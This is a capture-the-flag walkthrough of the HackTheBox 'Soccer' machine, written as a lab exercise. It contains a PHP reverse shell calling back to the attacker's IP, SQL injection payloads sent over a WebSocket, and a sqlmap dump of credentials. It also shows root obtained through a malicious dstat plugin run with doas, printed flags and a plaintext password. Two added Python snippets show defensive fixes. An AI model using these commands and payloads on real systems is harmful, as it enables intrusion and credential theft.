HTB Soccer done
Soccer
OS:
Linux
Technology:
Tiny File Manager 2.4.3
IP Address:
10.10.11.194
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
9091/tcp open xmltec-xmlmail?
Users and passwords:
Default creds for tiny (https://github.com/prasathmani/tinyfilemanager)
L: admin
P: admin@123
L: user
P: 12345
---
From the MySQL DB dump
L: player
P: PlayerOftheMatch2022
---
Nmap
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.194_nmap 10.10.11.194 ; cat 10.10.11.194_nmap.nmap | grep "tcp.*open"
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-23 09:56 CEST
Nmap scan report for 10.10.11.194
Host is up (0.054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
| 256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
|_ 256 5797565def793c2fcbdb35fff17c615c (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
9091/tcp open xmltec-xmlmail?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix:
| HTTP/1.1 400 Bad Request
| Connection: close
| GetRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 139
| Date: Tue, 23 Apr 2024 07:57:32 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot GET /</pre>
| </body>
| </html>
| HTTPOptions, RTSPRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 143
| Date: Tue, 23 Apr 2024 07:57:32 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot OPTIONS /</pre>
| </body>
|_ </html>
Ffuf - directories and subdomains
Nothing interesting here
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ ffuf -u http://10.10.11.194/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.10.11.194_ffuz -of all -e .php,.html,.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.194/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt
:: Output file : 10.10.11.194_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [81876/81876] :: Job [1/1] :: 586 req/sec :: Duration: [0:01:38] :: Errors: 0 ::
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ ffuf -u http://10.10.11.194 -H "Host: FUZZ.soccer.htb" -c -w /usr/share/wordlists/dirb/big.txt -ac -o 10.10.11.194_ffuz -of all
________________________________________________
:: Method : GET
:: URL : http://10.10.11.194
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Header : Host: FUZZ.soccer.htb
:: Output file : 10.10.11.194_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [20469/20469] :: Job [1/1] :: 952 req/sec :: Duration: [0:00:25] :: Errors: 0 ::
Add IP to /etc/hosts
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿pentest)-[~]
└─# echo "10.10.11.194 soccer.htb" >> /etc/hosts
Feroxbuster - http://soccer.htb
Found interesting links:
/tiny
/tiny/uploads
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ feroxbuster -u http://soccer.htb -o soccer.htb_feroxbuster
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.2
───────────────────────────┬──────────────────────
🎯 Target Url │ http://soccer.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.2
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💾 Output File │ soccer.htb_feroxbuster
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 7l 12w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 7l 10w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 494l 1440w 96128c http://soccer.htb/ground3.jpg
200 GET 2232l 4070w 223875c http://soccer.htb/ground4.jpg
200 GET 809l 5093w 490253c http://soccer.htb/ground1.jpg
200 GET 711l 4253w 403502c http://soccer.htb/ground2.jpg
200 GET 147l 526w 6917c http://soccer.htb/
301 GET 7l 12w 178c http://soccer.htb/tiny => http://soccer.htb/tiny/
301 GET 7l 12w 178c http://soccer.htb/tiny/uploads => http://soccer.htb/tiny/uploads/
[####################] - 57s 90021/90021 0s found:7 errors:0
[####################] - 41s 30000/30000 739/s http://soccer.htb/
[####################] - 42s 30000/30000 709/s http://soccer.htb/tiny/
[####################] - 42s 30000/30000 711/s http://soccer.htb/tiny/uploads/
Login to the Tiny File Manager admin panel
Default creds from github -- https://github.com/prasathmani/tinyfilemanager
L: admin
P: admin@123
L: user
P: 12345
---
Open the website and enter the creds
http://soccer.htb/tiny/tinyfilemanager.php?p=
---
Found version of tiny file manager
Tiny File Manager 2.4.3
PHP revshell
Create a revshell
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ cat revshell.php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.7/80 0>&1'");
?>
Upload revshell
We have to upload the revshell to /var/www/html/tiny/uploads
http://soccer.htb/tiny/tinyfilemanager.php?p=tiny%2Fuploads&upload
Run revshell
Check that the revshell was uploaded
http://soccer.htb/tiny/tinyfilemanager.php?p=tiny%2Fuploads
---
Start netcat
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ rlwrap -cAr nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.194] 34914
bash: cannot set terminal process group (1050): Inappropriate ioctl for device
bash: no job control in this shell
www-data@soccer:~/html/tiny/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@soccer:~/html/tiny/uploads$
www-data@soccer:~/html/tiny/uploads$ find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/player/user.txt
www-data@soccer:~/html/tiny/uploads$ cat /home/player/user.txt
cat /home/player/user.txt
cat: /home/player/user.txt: Permission denied
www-data@soccer:~/html/tiny/uploads$
---
Run revshell
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ curl http://soccer.htb/tiny/uploads/revshell.php
<html>
<head><title>504 Gateway Time-out</title></head>
<body>
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
Enumeration
Netstat - list services
I see 3 ports listening on localhost: 33060, 3306 and 3000
33060 - DB
3306 - DB
3000 - WWW
---
www-data@soccer:~/html/tiny/uploads$ netstat -tulpn
netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:9091 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1093/nginx: worker
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN 1093/nginx: worker
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
www-data@soccer:~/html/tiny/uploads$
---
www-data@soccer:~/html/tiny/uploads$ curl localhost:3000 | head -n 10
curl localhost:3000 | head -n 10
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="/js/bootstrap.bundle.min.js"></script>
<script src="/js/jquery.min.js"></script>
<title>Soccer</title>
100 6749 100 6749 0 0 1318k 0 --:--:-- --:--:-- --:--:-- 1318k
(23) Failed writing body
www-data@soccer:~/html/tiny/uploads$
---
www-data@soccer:~/html/tiny/uploads$ mysql -p 3306 ; mysql -p 33060
mysql -p 3306 ; mysql -p 33060
Enter password:
ERROR 1045 (28000): Access denied for user 'www-data'@'localhost' (using password: NO)
Enter password:
ERROR 1045 (28000): Access denied for user 'www-data'@'localhost' (using password: NO)
www-data@soccer:~/html/tiny/uploads$
Read nginx config file: /etc/nginx/sites-available/
We found the subdomain soc-player.soccer.htb; add it to /etc/hosts
---
Read config file: /etc/nginx/sites-available/default
www-data@soccer:~/html/tiny/uploads$ cat /etc/nginx/sites-available/default
cat /etc/nginx/sites-available/default
server {
listen 80;
listen [::]:80;
server_name 0.0.0.0;
return 301 http://soccer.htb$request_uri;
}
server {
listen 80;
listen [::]:80;
server_name soccer.htb;
root /var/www/html;
index index.html tinyfilemanager.php;
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php7.4-fpm.sock;
}
location ~ /\.ht {
deny all;
}
}
---
Read config file: /etc/nginx/sites-available/soc-player.htb
www-data@soccer:~/html/tiny/uploads$ cat /etc/nginx/sites-available/soc-player.htb
server {
listen 80;
listen [::]:80;
server_name soc-player.soccer.htb;
root /root/app/views;
location / {
proxy_pass http://localhost:3000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection 'upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}
Add hostname to /etc/hosts
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ cat /etc/hosts | grep soccer
10.10.11.194 soccer.htb soc-player.soccer.htb
Register an account on the login page
e-mail: [email protected]
username: pentester
password: Qwerty123
---
Create user
http://soc-player.soccer.htb/signup
---
Login to PA
http://soc-player.soccer.htb/check
Analyse network connection
It is a WebSocket; I can send JSON with an ID
http://soc-player.soccer.htb/check
SQLi over Websockets
SQLi - basic test
Payload: 0 OR 1=1--
---
{"id":"0 OR 1=1--"}
SQLi - UNION
Payload: 0 UNION select 1,2,3--
---
{"id":"0 UNION select 1,2,3--"}
SQLi - UNION table mysql.user
Payload: 0 UNION select user,2,3 from mysql.user where user like 'r%'--
---
{"id":"0 UNION select user,2,3 from mysql.user where user like 'r%'--"}
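As an added example (not part of the original writeup), a Python sketch of the pattern behind the /check socket: the vulnerable query that pastes the `id` field into the SQL text, next to a hardened handler that allow-lists the field's shape and binds it as a parameter. The table layout mirrors the dumped `accounts` table, but the row values are constructed placeholders and sqlite3 stands in for MySQL.

```python
import json
import re
import sqlite3


def make_db():
    """Constructed stand-in for soccer_db.accounts; sqlite3 replaces MySQL here
    and the row values are placeholders, not the box's real data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (id INTEGER, email TEXT, password TEXT, username TEXT)")
    db.execute("INSERT INTO accounts VALUES (1324, 'player@example.invalid', 'PLACEHOLDER', 'player')")
    return db


def check_ticket_unsafe(db, ticket_id):
    """Vulnerable pattern: the 'id' field from the frame is pasted into the SQL text,
    so '0 OR 1=1--' turns a lookup for a non-existent ticket into a match."""
    sql = f"SELECT id FROM accounts WHERE id = {ticket_id}"
    return db.execute(sql).fetchone() is not None


ID_RE = re.compile(r"[0-9]{1,10}")  # a ticket id is a plain decimal number


def check_ticket_safe(db, ticket_id):
    """Hardened form: allow-list the field's shape, then bind it as a parameter."""
    if not isinstance(ticket_id, str) or not ID_RE.fullmatch(ticket_id):
        raise ValueError("ticket id must be a plain decimal number")
    row = db.execute("SELECT id FROM accounts WHERE id = ?", (int(ticket_id),)).fetchone()
    return row is not None


def handle_frame(db, raw):
    """Handle one WebSocket text frame shaped like the page's {"id": "..."} messages.
    Malformed JSON, a non-object body and a rejected id all end as an error reply."""
    try:
        msg = json.loads(raw)
        return {"exists": check_ticket_safe(db, msg.get("id"))}
    except (ValueError, AttributeError) as exc:
        return {"error": str(exc)}


if __name__ == "__main__":
    db = make_db()
    for payload in ("1324", "9999", "0 OR 1=1--"):
        print(payload, "->", check_ticket_unsafe(db, payload), handle_frame(db, json.dumps({"id": payload})))
```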
sqlmap - basic scan
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1111"}' --dbms mysql --batch --level 5 --risk 3 | tee soc-player.soccer.htb:9091_sqlmap
___
__H__
___ ___[']_____ ___ ___ {1.8.3#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
...
...
...
---
[13:48:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:48:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb'
[*] ending @ 13:48:52 /2024-04-23/
sqlmap - list db
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ sqlmap -u ws://soc-player.soccer.htb:9091 --dbs --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 --threads 10 | tee soc-player.soccer.htb:9091_sqlmap_list_db
...
...
...
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys
[13:50:56] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb'
[*] ending @ 13:50:56 /2024-04-23/
sqlmap - list tables in soccer_db
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ sqlmap -u ws://soc-player.soccer.htb:9091 -D soccer_db --tables --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 --threads 10 | tee soc-player.soccer.htb:9091_sqlmap_list_tables
...
...
...
Database: soccer_db
[1 table]
+----------+
| accounts |
+----------+
[13:51:00] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb'
[*] ending @ 13:51:00 /2024-04-23/
!!!!!!!!! sqlmap - dump accounts
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ sqlmap -u ws://soc-player.soccer.htb:9091 -D soccer_db -T accounts --dump --data '{"id": "1111"}' --dbms mysql --batch --level 5 --risk 3 --threads 1 | tee soc-player.soccer.htb:9091_sqlmap_dump_accounts
...
...
...
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id | email | password | username |
+------+-------------------+----------------------+----------+
| 1324 | [email protected] | PlayerOftheMatch2022 | player |
+------+-------------------+----------------------+----------+
[14:35:21] [INFO] table 'soccer_db.accounts' dumped to CSV file '/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb/dump/soccer_db/accounts.csv'
[14:35:21] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb'
[*] ending @ 14:35:21 /2024-04-23/
SSH login as user: player
L: player
P: PlayerOftheMatch2022
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Soccer]
└─$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Apr 23 12:44:20 UTC 2024
System load: 0.03
Usage of /: 70.6% of 3.84GB
Memory usage: 22%
Swap usage: 0%
Processes: 229
Users logged in: 0
IPv4 address for eth0: 10.10.11.194
IPv6 address for eth0: dead:beef::250:56ff:feb9:679c
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Apr 23 12:44:06 2024 from 10.10.16.7
player@soccer:~$ id
uid=1001(player) gid=1001(player) groups=1001(player)
Read flag: user.txt
player@soccer:~$ cd ~
player@soccer:~$ ls -a
. .. .bash_history .bash_logout .bashrc .cache .profile .viminfo user.txt
player@soccer:~$ cat user.txt
086c319d6491c435a981fd05f7a618c4
player@soccer:~$
Privilege Escalation
Check /etc/sudoers
player@soccer:~$ sudo -l
[sudo] password for player:
Sorry, user player may not run sudo on localhost.
doas
doas is an alternative to sudo typically found on OpenBSD
---
player@soccer:~$ find / -perm -4000 2>/dev/null | grep -v "core\|lib"
/usr/local/bin/doas
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/at
player@soccer:~$ ls -la /usr/local/bin/doas
-rwsr-xr-x 1 root root 42224 Nov 17 2022 /usr/local/bin/doas
player@soccer:~$
player@soccer:~$ find / -name doas.conf 2>/dev/null
/usr/local/etc/doas.conf
player@soccer:~$
player@soccer:~$ cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat
dstat
dstat is a tool for getting system information.
---
Read man dstat (https://linux.die.net/man/1/dstat)
Paths that may contain external dstat_*.py plugins:
~/.dstat/
(path of binary)/plugins/
/usr/share/dstat/
/usr/local/share/dstat/
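As an added check (not from the original writeup), a Python audit of the configuration found on the box: it parses doas.conf permit rules and reports any that run dstat as root while one of the man page's plugin directories is writable by group or others. The `demo()` fixture builds two temporary directories to stand in for the real paths; the rule text is the page's, the directory modes are constructed.

```python
import os
import re
import stat
import tempfile

# dstat_*.py search paths from the dstat man page (the binary-relative plugins/ dir is omitted)
DSTAT_PLUGIN_DIRS = ("/usr/share/dstat/", "/usr/local/share/dstat/")

# doas.conf rule: permit [options] identity [as target] [cmd command [args ...]]
RULE_RE = re.compile(
    r"^\s*permit\s+(?P<opts>(?:(?:nopass|persist|keepenv|setenv\s*\{[^}]*\})\s+)*)"
    r"(?P<user>\S+)(?:\s+as\s+(?P<target>\S+))?(?:\s+cmd\s+(?P<cmd>\S+))?"
)


def parse_doas_rules(text):
    """Turn permit lines into dicts; a rule without 'as' targets root, as doas.conf(5) defines."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line.split("#", 1)[0])
        if m:
            rules.append({"user": m.group("user"), "target": m.group("target") or "root",
                          "cmd": m.group("cmd"),  # None means any command
                          "nopass": "nopass" in m.group("opts").split()})
    return rules


def insecure_plugin_dirs(plugin_dirs):
    """Return the plugin dirs that exist and are writable by group or others."""
    return [d for d in plugin_dirs
            if os.path.isdir(d) and os.stat(d).st_mode & (stat.S_IWGRP | stat.S_IWOTH)]


def audit(doas_text, plugin_dirs=DSTAT_PLUGIN_DIRS):
    """Flag rules that run dstat (or any command) as root while a plugin dir is writable
    by non-root: a dstat_*.py dropped in such a dir is imported and executed as root."""
    findings = []
    for rule in parse_doas_rules(doas_text):
        if rule["cmd"] is None or os.path.basename(rule["cmd"]) == "dstat":
            for d in insecure_plugin_dirs(plugin_dirs):
                findings.append((rule["user"], rule["target"], rule["cmd"], d))
    return findings


def demo():
    """Check the box's rule against constructed temporary dirs, one 0755 and one 0777."""
    conf = "permit nopass player as root cmd /usr/bin/dstat\n"  # rule from the page
    with tempfile.TemporaryDirectory() as tmp:
        safe, loose = os.path.join(tmp, "share", "dstat"), os.path.join(tmp, "local", "share", "dstat")
        os.makedirs(safe, mode=0o755)
        os.makedirs(loose)
        os.chmod(loose, 0o777)  # constructed world-writable plugin dir
        return audit(conf, (safe, loose)), loose
```

Run against a real host, `audit(open("/usr/local/etc/doas.conf").read())` with the default plugin dirs gives the same tuples for the live configuration.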
---
Create malicious plugin
player@soccer:~$ echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_malicious.py
---
Run dstat
player@soccer:~$ doas /usr/bin/dstat --malicious
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp
root@soccer:/home/player# id
uid=0(root) gid=0(root) groups=0(root)
Read flag: root.txt
root@soccer:/home/player# cd /root
root@soccer:~# ls -a
. .bash_history .cache .mysql_history .pm2 .ssh .viminfo root.txt snap
.. .bashrc .local .npm .profile .vim app run.sql
root@soccer:~# cat root.txt
a28d28528cacd2688b106ec9eb9e524b
root@soccer:~#
References
[dstat man page](https://linux.die.net/man/1/dstat)
Lessons Learned